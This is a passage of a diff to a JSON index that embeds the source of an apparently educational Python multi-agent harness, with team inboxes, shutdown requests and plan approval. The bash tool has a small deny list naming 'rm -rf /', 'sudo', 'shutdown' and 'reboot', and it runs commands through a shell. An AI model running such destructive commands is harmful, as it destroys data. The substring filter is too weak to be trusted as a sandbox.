history.append({\"role\": \"user\", \"content\": query})\n agent_loop(history)\n response_content = history[-1][\"content\"]\n if isinstance(response_content, list):\n for block in response_content:\n if hasattr(block, \"text\"):\n print(block.text)\n print()\n" }, { "id": "s10", "filename": "s10_team_protocols.py", "title": "Team Protocols", "subtitle": "Shared Communication Rules", - "loc": 419, + "loc": 416, "tools": [ "bash", "read_file", @@ -566,71 +566,71 @@ "classes": [ { "name": "MessageBus", - "startLine": 87, - "endLine": 128 + "startLine": 88, + "endLine": 129 }, { "name": "TeammateManager", - "startLine": 133, - "endLine": 290 + "startLine": 134, + "endLine": 291 } ], "functions": [ { "name": "_safe_path", "signature": "def _safe_path(p: str)", - "startLine": 295 + "startLine": 296 }, { "name": "_run_bash", "signature": "def _run_bash(command: str)", - "startLine": 302 + "startLine": 303 }, { "name": "_run_read", "signature": "def _run_read(path: str, limit: int = None)", - "startLine": 317 + "startLine": 318 }, { "name": "_run_write", "signature": "def _run_write(path: str, content: str)", - "startLine": 327 + "startLine": 328 }, { "name": "_run_edit", "signature": "def _run_edit(path: str, old_text: str, new_text: str)", - "startLine": 337 + "startLine": 338 }, { "name": "handle_shutdown_request", "signature": "def handle_shutdown_request(teammate: str)", - "startLine": 350 + "startLine": 351 }, { "name": "handle_plan_review", "signature": "def handle_plan_review(request_id: str, approve: bool, feedback: str = \"\")", - "startLine": 361 + "startLine": 362 }, { "name": "_check_shutdown_status", "signature": "def _check_shutdown_status(request_id: str)", - "startLine": 375 + "startLine": 376 }, { "name": "agent_loop", "signature": "def agent_loop(messages: list)", - "startLine": 425 + "startLine": 426 } ], "layer": "collaboration", - "source": "#!/usr/bin/env python3\n\"\"\"\ns10_team_protocols.py - Team Protocols\n\nShutdown protocol and plan approval protocol, both using the same\nrequest_id correlation pattern. Builds on s09's team messaging.\n\n Shutdown FSM: pending -> approved | rejected\n\n Lead Teammate\n +---------------------+ +---------------------+\n | shutdown_request | | |\n | { | -------> | receives request |\n | request_id: abc | | decides: approve? |\n | } | | |\n +---------------------+ +---------------------+\n |\n +---------------------+ +-------v-------------+\n | shutdown_response | <------- | shutdown_response |\n | { | | { |\n | request_id: abc | | request_id: abc |\n | approve: true | | approve: true |\n | } | | } |\n +---------------------+ +---------------------+\n |\n v\n status -> \"shutdown\", thread stops\n\n Plan approval FSM: pending -> approved | rejected\n\n Teammate Lead\n +---------------------+ +---------------------+\n | plan_approval | | |\n | submit: {plan:\"...\"}| -------> | reviews plan text |\n +---------------------+ | approve/reject? |\n +---------------------+\n |\n +---------------------+ +-------v-------------+\n | plan_approval_resp | <------- | plan_approval |\n | {approve: true} | | review: {req_id, |\n +---------------------+ | approve: true} |\n +---------------------+\n\n Trackers: {request_id: {\"target|from\": name, \"status\": \"pending|...\"}}\n\nKey insight: \"Same request_id correlation pattern, two domains.\"\n\"\"\"\n\nimport json\nimport os\nimport subprocess\nimport threading\nimport time\nimport uuid\nfrom pathlib import Path\n\nfrom anthropic import Anthropic\nfrom dotenv import load_dotenv\n\nload_dotenv(override=True)\nif os.getenv(\"ANTHROPIC_BASE_URL\"):\n os.environ.pop(\"ANTHROPIC_AUTH_TOKEN\", None)\n\nWORKDIR = Path.cwd()\nclient = Anthropic(base_url=os.getenv(\"ANTHROPIC_BASE_URL\"))\nMODEL = os.environ[\"MODEL_ID\"]\nTEAM_DIR = WORKDIR / \".team\"\nINBOX_DIR = TEAM_DIR / \"inbox\"\n\nSYSTEM = f\"You are a team lead at {WORKDIR}. Manage teammates with shutdown and plan approval protocols.\"\n\nVALID_MSG_TYPES = {\n \"message\",\n \"broadcast\",\n \"shutdown_request\",\n \"shutdown_response\",\n \"plan_approval_response\",\n}\n\n# -- Request trackers: correlate by request_id --\nshutdown_requests = {}\nplan_requests = {}\n_tracker_lock = threading.Lock()\n\n\n# -- MessageBus: JSONL inbox per teammate --\nclass MessageBus:\n def __init__(self, inbox_dir: Path):\n self.dir = inbox_dir\n self.dir.mkdir(parents=True, exist_ok=True)\n\n def send(self, sender: str, to: str, content: str,\n msg_type: str = \"message\", extra: dict = None) -> str:\n if msg_type not in VALID_MSG_TYPES:\n return f\"Error: Invalid type '{msg_type}'. Valid: {VALID_MSG_TYPES}\"\n msg = {\n \"type\": msg_type,\n \"from\": sender,\n \"content\": content,\n \"timestamp\": time.time(),\n }\n if extra:\n msg.update(extra)\n inbox_path = self.dir / f\"{to}.jsonl\"\n with open(inbox_path, \"a\") as f:\n f.write(json.dumps(msg) + \"\\n\")\n return f\"Sent {msg_type} to {to}\"\n\n def read_inbox(self, name: str) -> list:\n inbox_path = self.dir / f\"{name}.jsonl\"\n if not inbox_path.exists():\n return []\n messages = []\n for line in inbox_path.read_text().strip().splitlines():\n if line:\n messages.append(json.loads(line))\n inbox_path.write_text(\"\")\n return messages\n\n def broadcast(self, sender: str, content: str, teammates: list) -> str:\n count = 0\n for name in teammates:\n if name != sender:\n self.send(sender, name, content, \"broadcast\")\n count += 1\n return f\"Broadcast to {count} teammates\"\n\n\nBUS = MessageBus(INBOX_DIR)\n\n\n# -- TeammateManager with shutdown + plan approval --\nclass TeammateManager:\n def __init__(self, team_dir: Path):\n self.dir = team_dir\n self.dir.mkdir(exist_ok=True)\n self.config_path = self.dir / \"config.json\"\n self.config = self._load_config()\n self.threads = {}\n\n def _load_config(self) -> dict:\n if self.config_path.exists():\n return json.loads(self.config_path.read_text())\n return {\"team_name\": \"default\", \"members\": []}\n\n def _save_config(self):\n self.config_path.write_text(json.dumps(self.config, indent=2))\n\n def _find_member(self, name: str) -> dict:\n for m in self.config[\"members\"]:\n if m[\"name\"] == name:\n return m\n return None\n\n def spawn(self, name: str, role: str, prompt: str) -> str:\n member = self._find_member(name)\n if member:\n if member[\"status\"] not in (\"idle\", \"shutdown\"):\n return f\"Error: '{name}' is currently {member['status']}\"\n member[\"status\"] = \"working\"\n member[\"role\"] = role\n else:\n member = {\"name\": name, \"role\": role, \"status\": \"working\"}\n self.config[\"members\"].append(member)\n self._save_config()\n thread = threading.Thread(\n target=self._teammate_loop,\n args=(name, role, prompt),\n daemon=True,\n )\n self.threads[name] = thread\n thread.start()\n return f\"Spawned '{name}' (role: {role})\"\n\n def _teammate_loop(self, name: str, role: str, prompt: str):\n sys_prompt = (\n f\"You are '{name}', role: {role}, at {WORKDIR}. \"\n f\"Submit plans via plan_approval before major work. \"\n f\"Respond to shutdown_request with shutdown_response.\"\n )\n messages = [{\"role\": \"user\", \"content\": prompt}]\n tools = self._teammate_tools()\n should_exit = False\n for _ in range(50):\n inbox = BUS.read_inbox(name)\n for msg in inbox:\n messages.append({\"role\": \"user\", \"content\": json.dumps(msg)})\n if should_exit:\n break\n try:\n response = client.messages.create(\n model=MODEL,\n system=sys_prompt,\n messages=messages,\n tools=tools,\n max_tokens=8000,\n )\n except Exception:\n break\n messages.append({\"role\": \"assistant\", \"content\": response.content})\n if response.stop_reason != \"tool_use\":\n break\n results = []\n for block in response.content:\n if block.type == \"tool_use\":\n output = self._exec(name, block.name, block.input)\n print(f\" [{name}] {block.name}: {str(output)[:120]}\")\n results.append({\n \"type\": \"tool_result\",\n \"tool_use_id\": block.id,\n \"content\": str(output),\n })\n if block.name == \"shutdown_response\" and block.input.get(\"approve\"):\n should_exit = True\n messages.append({\"role\": \"user\", \"content\": results})\n member = self._find_member(name)\n if member:\n member[\"status\"] = \"shutdown\" if should_exit else \"idle\"\n self._save_config()\n\n def _exec(self, sender: str, tool_name: str, args: dict) -> str:\n # these base tools are unchanged from s02\n if tool_name == \"bash\":\n return _run_bash(args[\"command\"])\n if tool_name == \"read_file\":\n return _run_read(args[\"path\"])\n if tool_name == \"write_file\":\n return _run_write(args[\"path\"], args[\"content\"])\n if tool_name == \"edit_file\":\n return _run_edit(args[\"path\"], args[\"old_text\"], args[\"new_text\"])\n if tool_name == \"send_message\":\n return BUS.send(sender, args[\"to\"], args[\"content\"], args.get(\"msg_type\", \"message\"))\n if tool_name == \"read_inbox\":\n return json.dumps(BUS.read_inbox(sender), indent=2)\n if tool_name == \"shutdown_response\":\n req_id = args[\"request_id\"]\n approve = args[\"approve\"]\n with _tracker_lock:\n if req_id in shutdown_requests:\n shutdown_requests[req_id][\"status\"] = \"approved\" if approve else \"rejected\"\n BUS.send(\n sender, \"lead\", args.get(\"reason\", \"\"),\n \"shutdown_response\", {\"request_id\": req_id, \"approve\": approve},\n )\n return f\"Shutdown {'approved' if approve else 'rejected'}\"\n if tool_name == \"plan_approval\":\n plan_text = args.get(\"plan\", \"\")\n req_id = str(uuid.uuid4())[:8]\n with _tracker_lock:\n plan_requests[req_id] = {\"from\": sender, \"plan\": plan_text, \"status\": \"pending\"}\n BUS.send(\n sender, \"lead\", plan_text, \"plan_approval_response\",\n {\"request_id\": req_id, \"plan\": plan_text},\n )\n return f\"Plan submitted (request_id={req_id}). Waiting for lead approval.\"\n return f\"Unknown tool: {tool_name}\"\n\n def _teammate_tools(self) -> list:\n # these base tools are unchanged from s02\n return [\n {\"name\": \"bash\", \"description\": \"Run a shell command.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"command\": {\"type\": \"string\"}}, \"required\": [\"command\"]}},\n {\"name\": \"read_file\", \"description\": \"Read file contents.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"path\": {\"type\": \"string\"}}, \"required\": [\"path\"]}},\n {\"name\": \"write_file\", \"description\": \"Write content to file.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"path\": {\"type\": \"string\"}, \"content\": {\"type\": \"string\"}}, \"required\": [\"path\", \"content\"]}},\n {\"name\": \"edit_file\", \"description\": \"Replace exact text in file.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"path\": {\"type\": \"string\"}, \"old_text\": {\"type\": \"string\"}, \"new_text\": {\"type\": \"string\"}}, \"required\": [\"path\", \"old_text\", \"new_text\"]}},\n {\"name\": \"send_message\", \"description\": \"Send message to a teammate.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"to\": {\"type\": \"string\"}, \"content\": {\"type\": \"string\"}, \"msg_type\": {\"type\": \"string\", \"enum\": list(VALID_MSG_TYPES)}}, \"required\": [\"to\", \"content\"]}},\n {\"name\": \"read_inbox\", \"description\": \"Read and drain your inbox.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {}}},\n {\"name\": \"shutdown_response\", \"description\": \"Respond to a shutdown request. Approve to shut down, reject to keep working.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"request_id\": {\"type\": \"string\"}, \"approve\": {\"type\": \"boolean\"}, \"reason\": {\"type\": \"string\"}}, \"required\": [\"request_id\", \"approve\"]}},\n {\"name\": \"plan_approval\", \"description\": \"Submit a plan for lead approval. Provide plan text.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"plan\": {\"type\": \"string\"}}, \"required\": [\"plan\"]}},\n ]\n\n def list_all(self) -> str:\n if not self.config[\"members\"]:\n return \"No teammates.\"\n lines = [f\"Team: {self.config['team_name']}\"]\n for m in self.config[\"members\"]:\n lines.append(f\" {m['name']} ({m['role']}): {m['status']}\")\n return \"\\n\".join(lines)\n\n def member_names(self) -> list:\n return [m[\"name\"] for m in self.config[\"members\"]]\n\n\nTEAM = TeammateManager(TEAM_DIR)\n\n\n# -- Base tool implementations (these base tools are unchanged from s02) --\ndef _safe_path(p: str) -> Path:\n path = (WORKDIR / p).resolve()\n if not path.is_relative_to(WORKDIR):\n raise ValueError(f\"Path escapes workspace: {p}\")\n return path\n\n\ndef _run_bash(command: str) -> str:\n dangerous = [\"rm -rf /\", \"sudo\", \"shutdown\", \"reboot\"]\n if any(d in command for d in dangerous):\n return \"Error: Dangerous command blocked\"\n try:\n r = subprocess.run(\n command, shell=True, cwd=WORKDIR,\n capture_output=True, text=True, timeout=120,\n )\n out = (r.stdout + r.stderr).strip()\n return out[:50000] if out else \"(no output)\"\n except subprocess.TimeoutExpired:\n return \"Error: Timeout (120s)\"\n\n\ndef _run_read(path: str, limit: int = None) -> str:\n try:\n lines = _safe_path(path).read_text().splitlines()\n if limit and limit < len(lines):\n lines = lines[:limit] + [f\"... ({len(lines) - limit} more)\"]\n return \"\\n\".join(lines)[:50000]\n except Exception as e:\n return f\"Error: {e}\"\n\n\ndef _run_write(path: str, content: str) -> str:\n try:\n fp = _safe_path(path)\n fp.parent.mkdir(parents=True, exist_ok=True)\n fp.write_text(content)\n return f\"Wrote {len(content)} bytes\"\n except Exception as e:\n return f\"Error: {e}\"\n\n\ndef _run_edit(path: str, old_text: str, new_text: str) -> str:\n try:\n fp = _safe_path(path)\n c = fp.read_text()\n if old_text not in c:\n return f\"Error: Text not found in {path}\"\n fp.write_text(c.replace(old_text, new_text, 1))\n return f\"Edited {path}\"\n except Exception as e:\n return f\"Error: {e}\"\n\n\n# -- Lead-specific protocol handlers --\ndef handle_shutdown_request(teammate: str) -> str:\n req_id = str(uuid.uuid4())[:8]\n with _tracker_lock:\n shutdown_requests[req_id] = {\"target\": teammate, \"status\": \"pending\"}\n BUS.send(\n \"lead\", teammate, \"Please shut down gracefully.\",\n \"shutdown_request\", {\"request_id\": req_id},\n )\n return f\"Shutdown request {req_id} sent to '{teammate}' (status: pending)\"\n\n\ndef handle_plan_review(request_id: str, approve: bool, feedback: str = \"\") -> str:\n with _tracker_lock:\n req = plan_requests.get(request_id)\n if not req:\n return f\"Error: Unknown plan request_id '{request_id}'\"\n with _tracker_lock:\n req[\"status\"] = \"approved\" if approve else \"rejected\"\n BUS.send(\n \"lead\", req[\"from\"], feedback, \"plan_approval_response\",\n {\"request_id\": request_id, \"approve\": approve, \"feedback\": feedback},\n )\n return f\"Plan {req['status']} for '{req['from']}'\"\n\n\ndef _check_shutdown_status(request_id: str) -> str:\n with _tracker_lock:\n return json.dumps(shutdown_requests.get(request_id, {\"error\": \"not found\"}))\n\n\n# -- Lead tool dispatch (12 tools) --\nTOOL_HANDLERS = {\n \"bash\": lambda **kw: _run_bash(kw[\"command\"]),\n \"read_file\": lambda **kw: _run_read(kw[\"path\"], kw.get(\"limit\")),\n \"write_file\": lambda **kw: _run_write(kw[\"path\"], kw[\"content\"]),\n \"edit_file\": lambda **kw: _run_edit(kw[\"path\"], kw[\"old_text\"], kw[\"new_text\"]),\n \"spawn_teammate\": lambda **kw: TEAM.spawn(kw[\"name\"], kw[\"role\"], kw[\"prompt\"]),\n \"list_teammates\": lambda **kw: TEAM.list_all(),\n \"send_message\": lambda **kw: BUS.send(\"lead\", kw[\"to\"], kw[\"content\"], kw.get(\"msg_type\", \"message\")),\n \"read_inbox\": lambda **kw: json.dumps(BUS.read_inbox(\"lead\"), indent=2),\n \"broadcast\": lambda **kw: BUS.broadcast(\"lead\", kw[\"content\"], TEAM.member_names()),\n \"shutdown_request\": lambda **kw: handle_shutdown_request(kw[\"teammate\"]),\n \"shutdown_response\": lambda **kw: _check_shutdown_status(kw.get(\"request_id\", \"\")),\n \"plan_approval\": lambda **kw: handle_plan_review(kw[\"request_id\"], kw[\"approve\"], kw.get(\"feedback\", \"\")),\n}\n\n# these base tools are unchanged from s02\nTOOLS = [\n {\"name\": \"bash\", \"description\": \"Run a shell command.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"command\": {\"type\": \"string\"}}, \"required\": [\"command\"]}},\n {\"name\": \"read_file\", \"description\": \"Read file contents.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"path\": {\"type\": \"string\"}, \"limit\": {\"type\": \"integer\"}}, \"required\": [\"path\"]}},\n {\"name\": \"write_file\", \"description\": \"Write content to file.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"path\": {\"type\": \"string\"}, \"content\": {\"type\": \"string\"}}, \"required\": [\"path\", \"content\"]}},\n {\"name\": \"edit_file\", \"description\": \"Replace exact text in file.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"path\": {\"type\": \"string\"}, \"old_text\": {\"type\": \"string\"}, \"new_text\": {\"type\": \"string\"}}, \"required\": [\"path\", \"old_text\", \"new_text\"]}},\n {\"name\": \"spawn_teammate\", \"description\": \"Spawn a persistent teammate.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"name\": {\"type\": \"string\"}, \"role\": {\"type\": \"string\"}, \"prompt\": {\"type\": \"string\"}}, \"required\": [\"name\", \"role\", \"prompt\"]}},\n {\"name\": \"list_teammates\", \"description\": \"List all teammates.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {}}},\n {\"name\": \"send_message\", \"description\": \"Send a message to a teammate.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"to\": {\"type\": \"string\"}, \"content\": {\"type\": \"string\"}, \"msg_type\": {\"type\": \"string\", \"enum\": list(VALID_MSG_TYPES)}}, \"required\": [\"to\", \"content\"]}},\n {\"name\": \"read_inbox\", \"description\": \"Read and drain the lead's inbox.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {}}},\n {\"name\": \"broadcast\", \"description\": \"Send a message to all teammates.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"content\": {\"type\": \"string\"}}, \"required\": [\"content\"]}},\n {\"name\": \"shutdown_request\", \"description\": \"Request a teammate to shut down gracefully. Returns a request_id for tracking.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"teammate\": {\"type\": \"string\"}}, \"required\": [\"teammate\"]}},\n {\"name\": \"shutdown_response\", \"description\": \"Check the status of a shutdown request by request_id.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"request_id\": {\"type\": \"string\"}}, \"required\": [\"request_id\"]}},\n {\"name\": \"plan_approval\", \"description\": \"Approve or reject a teammate's plan. Provide request_id + approve + optional feedback.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"request_id\": {\"type\": \"string\"}, \"approve\": {\"type\": \"boolean\"}, \"feedback\": {\"type\": \"string\"}}, \"required\": [\"request_id\", \"approve\"]}},\n]\n\n\ndef agent_loop(messages: list):\n while True:\n inbox = BUS.read_inbox(\"lead\")\n if inbox:\n messages.append({\n \"role\": \"user\",\n \"content\": f\"{json.dumps(inbox, indent=2)}\",\n })\n messages.append({\n \"role\": \"assistant\",\n \"content\": \"Noted inbox messages.\",\n })\n response = client.messages.create(\n model=MODEL,\n system=SYSTEM,\n messages=messages,\n tools=TOOLS,\n max_tokens=8000,\n )\n messages.append({\"role\": \"assistant\", \"content\": response.content})\n if response.stop_reason != \"tool_use\":\n return\n results = []\n for block in response.content:\n if block.type == \"tool_use\":\n handler = TOOL_HANDLERS.get(block.name)\n try:\n output = handler(**block.input) if handler else f\"Unknown tool: {block.name}\"\n except Exception as e:\n output = f\"Error: {e}\"\n print(f\"> {block.name}: {str(output)[:200]}\")\n results.append({\n \"type\": \"tool_result\",\n \"tool_use_id\": block.id,\n \"content\": str(output),\n })\n messages.append({\"role\": \"user\", \"content\": results})\n\n\nif __name__ == \"__main__\":\n history = []\n while True:\n try:\n query = input(\"\\033[36ms10 >> \\033[0m\")\n except (EOFError, KeyboardInterrupt):\n break\n if query.strip().lower() in (\"q\", \"exit\", \"\"):\n break\n if query.strip() == \"/team\":\n print(TEAM.list_all())\n continue\n if query.strip() == \"/inbox\":\n print(json.dumps(BUS.read_inbox(\"lead\"), indent=2))\n continue\n history.append({\"role\": \"user\", \"content\": query})\n agent_loop(history)\n response_content = history[-1][\"content\"]\n if isinstance(response_content, list):\n for block in response_content:\n if hasattr(block, \"text\"):\n print(block.text)\n print()\n" + "source": "#!/usr/bin/env python3\n# Harness: protocols -- structured handshakes between models.\n\"\"\"\ns10_team_protocols.py - Team Protocols\n\nShutdown protocol and plan approval protocol, both using the same\nrequest_id correlation pattern. Builds on s09's team messaging.\n\n Shutdown FSM: pending -> approved | rejected\n\n Lead Teammate\n +---------------------+ +---------------------+\n | shutdown_request | | |\n | { | -------> | receives request |\n | request_id: abc | | decides: approve? |\n | } | | |\n +---------------------+ +---------------------+\n |\n +---------------------+ +-------v-------------+\n | shutdown_response | <------- | shutdown_response |\n | { | | { |\n | request_id: abc | | request_id: abc |\n | approve: true | | approve: true |\n | } | | } |\n +---------------------+ +---------------------+\n |\n v\n status -> \"shutdown\", thread stops\n\n Plan approval FSM: pending -> approved | rejected\n\n Teammate Lead\n +---------------------+ +---------------------+\n | plan_approval | | |\n | submit: {plan:\"...\"}| -------> | reviews plan text |\n +---------------------+ | approve/reject? |\n +---------------------+\n |\n +---------------------+ +-------v-------------+\n | plan_approval_resp | <------- | plan_approval |\n | {approve: true} | | review: {req_id, |\n +---------------------+ | approve: true} |\n +---------------------+\n\n Trackers: {request_id: {\"target|from\": name, \"status\": \"pending|...\"}}\n\nKey insight: \"Same request_id correlation pattern, two domains.\"\n\"\"\"\n\nimport json\nimport os\nimport subprocess\nimport threading\nimport time\nimport uuid\nfrom pathlib import Path\n\nfrom anthropic import Anthropic\nfrom dotenv import load_dotenv\n\nload_dotenv(override=True)\nif os.getenv(\"ANTHROPIC_BASE_URL\"):\n os.environ.pop(\"ANTHROPIC_AUTH_TOKEN\", None)\n\nWORKDIR = Path.cwd()\nclient = Anthropic(base_url=os.getenv(\"ANTHROPIC_BASE_URL\"))\nMODEL = os.environ[\"MODEL_ID\"]\nTEAM_DIR = WORKDIR / \".team\"\nINBOX_DIR = TEAM_DIR / \"inbox\"\n\nSYSTEM = f\"You are a team lead at {WORKDIR}. Manage teammates with shutdown and plan approval protocols.\"\n\nVALID_MSG_TYPES = {\n \"message\",\n \"broadcast\",\n \"shutdown_request\",\n \"shutdown_response\",\n \"plan_approval_response\",\n}\n\n# -- Request trackers: correlate by request_id --\nshutdown_requests = {}\nplan_requests = {}\n_tracker_lock = threading.Lock()\n\n\n# -- MessageBus: JSONL inbox per teammate --\nclass MessageBus:\n def __init__(self, inbox_dir: Path):\n self.dir = inbox_dir\n self.dir.mkdir(parents=True, exist_ok=True)\n\n def send(self, sender: str, to: str, content: str,\n msg_type: str = \"message\", extra: dict = None) -> str:\n if msg_type not in VALID_MSG_TYPES:\n return f\"Error: Invalid type '{msg_type}'. Valid: {VALID_MSG_TYPES}\"\n msg = {\n \"type\": msg_type,\n \"from\": sender,\n \"content\": content,\n \"timestamp\": time.time(),\n }\n if extra:\n msg.update(extra)\n inbox_path = self.dir / f\"{to}.jsonl\"\n with open(inbox_path, \"a\") as f:\n f.write(json.dumps(msg) + \"\\n\")\n return f\"Sent {msg_type} to {to}\"\n\n def read_inbox(self, name: str) -> list:\n inbox_path = self.dir / f\"{name}.jsonl\"\n if not inbox_path.exists():\n return []\n messages = []\n for line in inbox_path.read_text().strip().splitlines():\n if line:\n messages.append(json.loads(line))\n inbox_path.write_text(\"\")\n return messages\n\n def broadcast(self, sender: str, content: str, teammates: list) -> str:\n count = 0\n for name in teammates:\n if name != sender:\n self.send(sender, name, content, \"broadcast\")\n count += 1\n return f\"Broadcast to {count} teammates\"\n\n\nBUS = MessageBus(INBOX_DIR)\n\n\n# -- TeammateManager with shutdown + plan approval --\nclass TeammateManager:\n def __init__(self, team_dir: Path):\n self.dir = team_dir\n self.dir.mkdir(exist_ok=True)\n self.config_path = self.dir / \"config.json\"\n self.config = self._load_config()\n self.threads = {}\n\n def _load_config(self) -> dict:\n if self.config_path.exists():\n return json.loads(self.config_path.read_text())\n return {\"team_name\": \"default\", \"members\": []}\n\n def _save_config(self):\n self.config_path.write_text(json.dumps(self.config, indent=2))\n\n def _find_member(self, name: str) -> dict:\n for m in self.config[\"members\"]:\n if m[\"name\"] == name:\n return m\n return None\n\n def spawn(self, name: str, role: str, prompt: str) -> str:\n member = self._find_member(name)\n if member:\n if member[\"status\"] not in (\"idle\", \"shutdown\"):\n return f\"Error: '{name}' is currently {member['status']}\"\n member[\"status\"] = \"working\"\n member[\"role\"] = role\n else:\n member = {\"name\": name, \"role\": role, \"status\": \"working\"}\n self.config[\"members\"].append(member)\n self._save_config()\n thread = threading.Thread(\n target=self._teammate_loop,\n args=(name, role, prompt),\n daemon=True,\n )\n self.threads[name] = thread\n thread.start()\n return f\"Spawned '{name}' (role: {role})\"\n\n def _teammate_loop(self, name: str, role: str, prompt: str):\n sys_prompt = (\n f\"You are '{name}', role: {role}, at {WORKDIR}. \"\n f\"Submit plans via plan_approval before major work. \"\n f\"Respond to shutdown_request with shutdown_response.\"\n )\n messages = [{\"role\": \"user\", \"content\": prompt}]\n tools = self._teammate_tools()\n should_exit = False\n for _ in range(50):\n inbox = BUS.read_inbox(name)\n for msg in inbox:\n messages.append({\"role\": \"user\", \"content\": json.dumps(msg)})\n if should_exit:\n break\n try:\n response = client.messages.create(\n model=MODEL,\n system=sys_prompt,\n messages=messages,\n tools=tools,\n max_tokens=8000,\n )\n except Exception:\n break\n messages.append({\"role\": \"assistant\", \"content\": response.content})\n if response.stop_reason != \"tool_use\":\n break\n results = []\n for block in response.content:\n if block.type == \"tool_use\":\n output = self._exec(name, block.name, block.input)\n print(f\" [{name}] {block.name}: {str(output)[:120]}\")\n results.append({\n \"type\": \"tool_result\",\n \"tool_use_id\": block.id,\n \"content\": str(output),\n })\n if block.name == \"shutdown_response\" and block.input.get(\"approve\"):\n should_exit = True\n messages.append({\"role\": \"user\", \"content\": results})\n member = self._find_member(name)\n if member:\n member[\"status\"] = \"shutdown\" if should_exit else \"idle\"\n self._save_config()\n\n def _exec(self, sender: str, tool_name: str, args: dict) -> str:\n # these base tools are unchanged from s02\n if tool_name == \"bash\":\n return _run_bash(args[\"command\"])\n if tool_name == \"read_file\":\n return _run_read(args[\"path\"])\n if tool_name == \"write_file\":\n return _run_write(args[\"path\"], args[\"content\"])\n if tool_name == \"edit_file\":\n return _run_edit(args[\"path\"], args[\"old_text\"], args[\"new_text\"])\n if tool_name == \"send_message\":\n return BUS.send(sender, args[\"to\"], args[\"content\"], args.get(\"msg_type\", \"message\"))\n if tool_name == \"read_inbox\":\n return json.dumps(BUS.read_inbox(sender), indent=2)\n if tool_name == \"shutdown_response\":\n req_id = args[\"request_id\"]\n approve = args[\"approve\"]\n with _tracker_lock:\n if req_id in shutdown_requests:\n shutdown_requests[req_id][\"status\"] = \"approved\" if approve else \"rejected\"\n BUS.send(\n sender, \"lead\", args.get(\"reason\", \"\"),\n \"shutdown_response\", {\"request_id\": req_id, \"approve\": approve},\n )\n return f\"Shutdown {'approved' if approve else 'rejected'}\"\n if tool_name == \"plan_approval\":\n plan_text = args.get(\"plan\", \"\")\n req_id = str(uuid.uuid4())[:8]\n with _tracker_lock:\n plan_requests[req_id] = {\"from\": sender, \"plan\": plan_text, \"status\": \"pending\"}\n BUS.send(\n sender, \"lead\", plan_text, \"plan_approval_response\",\n {\"request_id\": req_id, \"plan\": plan_text},\n )\n return f\"Plan submitted (request_id={req_id}). Waiting for lead approval.\"\n return f\"Unknown tool: {tool_name}\"\n\n def _teammate_tools(self) -> list:\n # these base tools are unchanged from s02\n return [\n {\"name\": \"bash\", \"description\": \"Run a shell command.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"command\": {\"type\": \"string\"}}, \"required\": [\"command\"]}},\n {\"name\": \"read_file\", \"description\": \"Read file contents.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"path\": {\"type\": \"string\"}}, \"required\": [\"path\"]}},\n {\"name\": \"write_file\", \"description\": \"Write content to file.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"path\": {\"type\": \"string\"}, \"content\": {\"type\": \"string\"}}, \"required\": [\"path\", \"content\"]}},\n {\"name\": \"edit_file\", \"description\": \"Replace exact text in file.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"path\": {\"type\": \"string\"}, \"old_text\": {\"type\": \"string\"}, \"new_text\": {\"type\": \"string\"}}, \"required\": [\"path\", \"old_text\", \"new_text\"]}},\n {\"name\": \"send_message\", \"description\": \"Send message to a teammate.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"to\": {\"type\": \"string\"}, \"content\": {\"type\": \"string\"}, \"msg_type\": {\"type\": \"string\", \"enum\": list(VALID_MSG_TYPES)}}, \"required\": [\"to\", \"content\"]}},\n {\"name\": \"read_inbox\", \"description\": \"Read and drain your inbox.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {}}},\n {\"name\": \"shutdown_response\", \"description\": \"Respond to a shutdown request. Approve to shut down, reject to keep working.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"request_id\": {\"type\": \"string\"}, \"approve\": {\"type\": \"boolean\"}, \"reason\": {\"type\": \"string\"}}, \"required\": [\"request_id\", \"approve\"]}},\n {\"name\": \"plan_approval\", \"description\": \"Submit a plan for lead approval. Provide plan text.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"plan\": {\"type\": \"string\"}}, \"required\": [\"plan\"]}},\n ]\n\n def list_all(self) -> str:\n if not self.config[\"members\"]:\n return \"No teammates.\"\n lines = [f\"Team: {self.config['team_name']}\"]\n for m in self.config[\"members\"]:\n lines.append(f\" {m['name']} ({m['role']}): {m['status']}\")\n return \"\\n\".join(lines)\n\n def member_names(self) -> list:\n return [m[\"name\"] for m in self.config[\"members\"]]\n\n\nTEAM = TeammateManager(TEAM_DIR)\n\n\n# -- Base tool implementations (these base tools are unchanged from s02) --\ndef _safe_path(p: str) -> Path:\n path = (WORKDIR / p).resolve()\n if not path.is_relative_to(WORKDIR):\n raise ValueError(f\"Path escapes workspace: {p}\")\n return path\n\n\ndef _run_bash(command: str) -> str:\n dangerous = [\"rm -rf /\", \"sudo\", \"shutdown\", \"reboot\"]\n if any(d in command for d in dangerous):\n return \"Error: Dangerous command blocked\"\n try:\n r = subprocess.run(\n command, shell=True, cwd=WORKDIR,\n capture_output=True, text=True, timeout=120,\n )\n out = (r.stdout + r.stderr).strip()\n return out[:50000] if out else \"(no output)\"\n except subprocess.TimeoutExpired:\n return \"Error: Timeout 